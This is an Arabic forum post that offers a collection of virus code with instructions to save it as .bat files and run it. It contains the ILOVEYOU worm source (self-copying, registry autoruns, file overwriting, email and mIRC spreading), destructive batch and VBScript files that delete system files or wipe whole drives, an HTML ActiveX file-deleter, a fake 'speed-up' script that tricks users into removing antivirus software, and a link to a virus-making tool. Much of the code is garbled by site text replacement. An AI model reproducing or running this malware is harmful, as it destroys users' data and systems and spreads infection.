بسم الله الرحمن الرحيم
اعزائى اعضاء وزوار موقع اليوم اقدم لكم مجموعة متنوعة من اكواد الفيروسات الشهيرة , وننصح بعدم استخدم هذه الفيروسات على نفسك وعندما تريد استخدمها يجب ان يكون لديك برنامج AntiVirus .
كيفية تشغيل هذه الاكواد وعمل فيروسات منها ؟
- كل ماعليك هو ان تاخذ الكود من هنا , وتضعه فى الـ Notepad وتحفظه بامتداد Bat واحزر الضغط عليه .
الاكــــــــــــواد
كود فيروس الحب Love
برنامج:
rem barok -loveletter(vbe) <i hate go to school>
rem by: EVIL-MASTER / [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]/ Group /EVIL-ATTACK Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow
eq=""
ctr=0
Set fso = CreateObject("ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing.FileSystemObject")
set file = fso.OpenTextFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Fullname,1)
vbscopy=file.ReadAll
REM main() ' CSS: Main has been REMed out to provide more innoculation. unREM to run.
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\ghaaly.c om/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/FullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
REM spreadtoemail() ' CSS: Causes the worm to propogate itself. REMed for even more innoculation.
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\Run\MSKernel32",dirsystem&"\MSKernel32. vbs"
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL .vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V
bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras
djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy
7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Curr
entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about :blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
Sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.Getghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Name(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ini") or (s="mirc.hlp") then
set ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini=fso.CreateTextFile(folderspec&"\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.i ni")
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "[ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/]"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";mIRC ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "; Please dont edit this ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/... mIRC will corrupt, if mIRC will"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine " corrupt... ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ will affect and will not run correctly. thanks"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";Khaled Mardam-Bey"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";http://www.mirc.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n0=on 1:JOIN:#:{"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n1= /if ( $nick == $me ) { halt }"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n3=}"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega
d
set regedit=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.****l")
set out=Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&ma lead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
---------------------------------------------------------------------------------------------------------
كود فيروس لتدمير الـ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/
برنامج:
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\msconfig.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll32.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\regedit.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logos.sys
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logow.sys
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\Sysedit.exe
Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.com
@Echo off
c:
cd %WinDir%\System\
deltree /y *.exe
--------------------------------------------------------------------------------------------------------
كود فيروس الـ Visual Basic
برنامج:
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe", vbNormal
SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe"
Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe"
---------------------------------------------------------------------------------------------------------
كود فيروس الـ HTML
برنامج:
<html>
<head>
<ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ **********="*******-Type"
*******="text/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0">
<ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ ********="VBghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/>
<!--- This ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ author is THEONE---!>
</body>
</html>
---------------------------------------------------------------------------------------------------------
كود فيروس يمحى جميع الملفات التى على الهارد
برنامج:
@echo off
c:
cd\
deltree /y *.*
d:
cd\
deltree /y *.*
--------------------------------------------------------------------------------------------------------
كود فيروس يدمر برنامج الـ Norton والـ Zone Alarm
برنامج:
@echo welcome to the winbooster by Agent007
@echo if u want to make your computer get faster , you should follow
@echo the next steps (step by step)
@pause
cd\
c:
dir
dir c:\progra~1\norton~1
@echo if u want to make your computer faster
@pause
@echo now you should to type y and press enter
del c:\progra~1\norton~1
@pause
c:
dir
@echo if u want to make your computer faster
@pause
@dir c:\progra~1
dir c:\progra~1\zonea~1\zonealarm
del c:\progra~1\zonea~1\zonealarm
@echo be happy your computer now is faster than before
:exit
--------------------------------------------------------------------------------------------------------------------
فيروس جديد من Conficker سيضرب بقوة في 1نيسان ( أبريل )
الخبر ليس مزحة أو "كذبة أبريل" وفق ما أكده خبراء في مجال تكنولوجيا الحواسيب والبرمجيات بل هي معلومة صحيحة وتحذير علني رفعه العلماء بخصوص فيروس جديد من سلالة Conficker / Downadup من المتوقع أن يشن هجوما عنيفا وواسعا أول شهر أبريل القادم ووفقا للخبراء الذين عاينوا الفيروس فانه قادر على اكتساح جميع البرمجيات وحواسيب ويندوز والاطلاع على المعلومات الشخصية والملفات والرسائل الضارة وإعادة إرسالها للمستعملين فضلا عن سرقة جميع البيانات.
وقد ظهرت أول سلالة من هذا الفيروس تحت اسم Kido Downadup في نوفمبر الماضي. وهاجم حينها الشبكة الداخلية التابعة لسلاح البحرية الفرنسية في شهر يناير.
المثير في القصة أن شركة مايكروسوفت رصدت جائزة مالية قدرت بنحو 250 ألف دولار لمن يعثر على صاحب الفيروس كما أكد الباحثون في مختبرات تريند مايكرو لمكافحة الفيروسات أن فيروس Conficker في نسخته الجديدة هو الأكثر خطورة وتعقيدا ومن المتوقع أن يصيب ضعف أعداد الفيروسات السابقة بما أنه يستخدم رموز تشفير ة مما يصعب على الخبراء تحديد المجالات التي يمكن ان تتعرض للهجوم في 1 أبريل.
__________________
-------------------------------------------------------------------------------------------------------------------
هذا هو برنامج صنع الفيروسات!!!
وهو برنامج جدا جدا جدا يدمر الياهو ماسينجير و ال msn والNorton Anti virus
ايضا وتدمير النوت باد و الكثير..............................
وارجو عدم استعماله ضد اخواننا المسليمن واستعمله ضد اعداء الله
تحذير: عدم فتح الفيروس بعد صنعه!
وانا برىء من اي شىء حدث لحاسوبك
وصلة التحميل
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
موضوع: اكبر موسوعة عن الفايروسات 
الأحد أبريل 25, 2010 4:05 am